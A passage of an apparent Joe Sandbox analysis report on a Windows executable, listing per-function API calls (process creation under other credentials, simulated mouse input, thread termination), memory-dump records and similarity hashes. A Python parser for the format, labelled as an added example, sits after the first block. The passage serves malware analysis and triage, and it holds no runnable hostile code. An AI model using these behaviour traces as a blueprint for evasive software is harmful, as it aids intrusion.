                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                          • String ID:
                                                                                          • API String ID: 1640429340-0
                                                                                          • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                          • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                          • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                          • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
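The function blocks above all follow one fixed layout (an APIs list whose entries read `Name.MODULE(args), ref: address`, with sub-calls marked "Part of subcall function", then a Memory Dump Source record and the Similarity hashes), which makes them easy to pull into a structured form for triage. The Python script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses blocks in that layout from a constructed sample copied from the listings above, records each call's module, arguments, address and (for sub-calls) the parent function, and decodes a handful of Win32 constants that appear in these blocks (mouse_event flags, ShowWindow commands, a few common-control message numbers) using values from the public Windows SDK headers. The constant tables, the block-splitting rule and all helper names are the example's own assumptions.

```python
"""Parse Joe Sandbox per-function API listings ("APIs / Memory Dump Source /
Similarity" blocks) into records and decode a few Win32 constants.
Added example; not part of Joe Sandbox or of the analysed sample."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Win32 constants used for decoding (values from the Windows SDK headers).
MOUSEEVENTF = {0x0001: "MOUSEEVENTF_MOVE", 0x0002: "MOUSEEVENTF_LEFTDOWN",
               0x0004: "MOUSEEVENTF_LEFTUP", 0x8000: "MOUSEEVENTF_ABSOLUTE"}
SHOW_CMD = {0: "SW_HIDE", 4: "SW_SHOWNOACTIVATE", 5: "SW_SHOW"}
MESSAGES = {0x00F1: "BM_SETCHECK", 0x1024: "LVM_SETTEXTCOLOR",
            0x1074: "LVM_SETITEMTEXTW", 0x111E: "TVM_SETTEXTCOLOR",
            0x130C: "TCM_SETCURSEL"}

# One API entry: optional sub-call parent, Name.MODULE, optional (args), ref: addr
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function ([0-9A-F]{8}):\s*)?"
    r"([A-Za-z_@0-9:]+)\.([A-Z0-9]+)"
    r"(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-F]{8})")
META_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")   # "• Key: value" lines
LINK_RESIDUE = "Download File"                     # link text fused onto dump names


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Expand a bit mask into known flag names; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else hex(value)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None   # parent function when listed as a sub-call

    def decoded(self) -> Optional[str]:
        """Decode the one argument we know how to read; '?' arguments give None."""
        try:
            if self.name == "mouse_event" and self.args:
                return decode_flags(int(self.args[0], 16), MOUSEEVENTF)
            if self.name == "ShowWindow" and len(self.args) > 1:
                return SHOW_CMD.get(int(self.args[1], 16))
            if self.name in ("SendMessageW", "SendMessageA") and len(self.args) > 1:
                return MESSAGES.get(int(self.args[1], 16))
        except ValueError:   # argument unresolved at analysis time ("?")
            return None
        return None


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)
    associated: List[str] = field(default_factory=list)


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split report text into function blocks. A block starts at an "APIs" header,
    or at "Memory Dump Source" when the previous block already has its dump record
    (blocks with no API calls carry no "APIs" header)."""
    blocks: List[FunctionBlock] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            blocks.append(FunctionBlock())
            continue
        if line == "Memory Dump Source":
            if not blocks or blocks[-1].meta:
                blocks.append(FunctionBlock())
            continue
        if line in ("Joe Sandbox IDA Plugin", "Similarity"):
            continue
        m = API_RE.match(line)
        if m:
            parent, name, module, argstr, ref = m.groups()
            args = [a.strip() for a in argstr.split(",")] if argstr else []
            blocks[-1].calls.append(ApiCall(name, module, args, ref, parent))
            continue
        m = META_RE.match(line)
        if m and blocks:
            key, value = m.group(1).strip(), m.group(2).strip()
            if value.endswith(LINK_RESIDUE):
                value = value[: -len(LINK_RESIDUE)]
            if key == "Associated":
                blocks[-1].associated.append(value)
            else:
                blocks[-1].meta[key] = value
    return blocks


def summarize(block: FunctionBlock) -> List[str]:
    """One triage line per call: Name.MODULE @addr [-> decoded] [(via parent)]."""
    out = []
    for c in block.calls:
        line = f"{c.name}.{c.module} @{c.ref}"
        d = c.decoded()
        if d:
            line += f" -> {d}"
        if c.subcall_of:
            line += f" (via {c.subcall_of})"
        out.append(line)
    return out


# Constructed sample in the report's layout, copied from the listings on this page.
SAMPLE = """\
APIs
• GetForegroundWindow.USER32 ref: 00442597
  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
• GetDesktopWindow.USER32 ref: 004425BF
• mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
• GetCursorPos.USER32(?), ref: 00442624
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
APIs
• ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
"""

if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE)):
        print(f"block {i}: fuzzy={b.meta.get('Instruction Fuzzy Hash', '-')[:16]}")
        for s in summarize(b):
            print("  ", s)
```

Feed the script the text of a saved report page to get one record per function; the decoded column is what turns `mouse_event(00008001, …)` into `MOUSEEVENTF_MOVE|MOUSEEVENTF_ABSOLUTE` and `SendMessageW(?, 0000130C, …)` into `TCM_SETCURSEL` without a trip to the SDK headers. Arguments the sandbox could not resolve stay as `?` and decode to nothing, so the summary never invents a value for them.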
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                          • String ID:
                                                                                          • API String ID: 3354276064-0
                                                                                          • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                          • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                          • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                          • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                          • String ID:
                                                                                          • API String ID: 752480666-0
                                                                                          • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                          • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                          • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                          • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                          • String ID:
                                                                                          • API String ID: 3275902921-0
                                                                                          • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                          • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                          • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                          • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                          • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                          • String ID:
                                                                                          • API String ID: 1413079979-0
                                                                                          • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                          • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                          • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                          • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                          APIs
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                          • __calloc_crt.LIBCMT ref: 0041419B
                                                                                          • __getptd.LIBCMT ref: 004141A8
                                                                                          • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                          • __dosmaperr.LIBCMT ref: 00414201
                                                                                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1803633139-0
                                                                                          • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                          • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                          • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                          • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                          APIs
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                          • String ID:
                                                                                          • API String ID: 3275902921-0
                                                                                          • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                          • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                          • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                          • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                          APIs
                                                                                          • SendMessageW.USER32 ref: 004554DF
                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3691411573-0
                                                                                          • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                          • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                                          • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                          • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                          • String ID:
                                                                                          • API String ID: 1814673581-0
                                                                                          • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                          • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                          • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                          • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                          • String ID:
                                                                                          • API String ID: 2833360925-0
                                                                                          • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                          • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                          • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                          • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                          APIs
                                                                                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                          • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                          • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                          • EndPath.GDI32(?), ref: 0044724E
                                                                                          • StrokePath.GDI32(?), ref: 0044725C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                          • String ID:
                                                                                          • API String ID: 372113273-0
                                                                                          APIs
                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual
                                                                                          • String ID:
                                                                                          • API String ID: 4278518827-0
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDevice$Release
                                                                                          • String ID:
                                                                                          • API String ID: 1035833867-0
                                                                                          APIs
                                                                                          • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                          • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                            • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                          • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                          • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
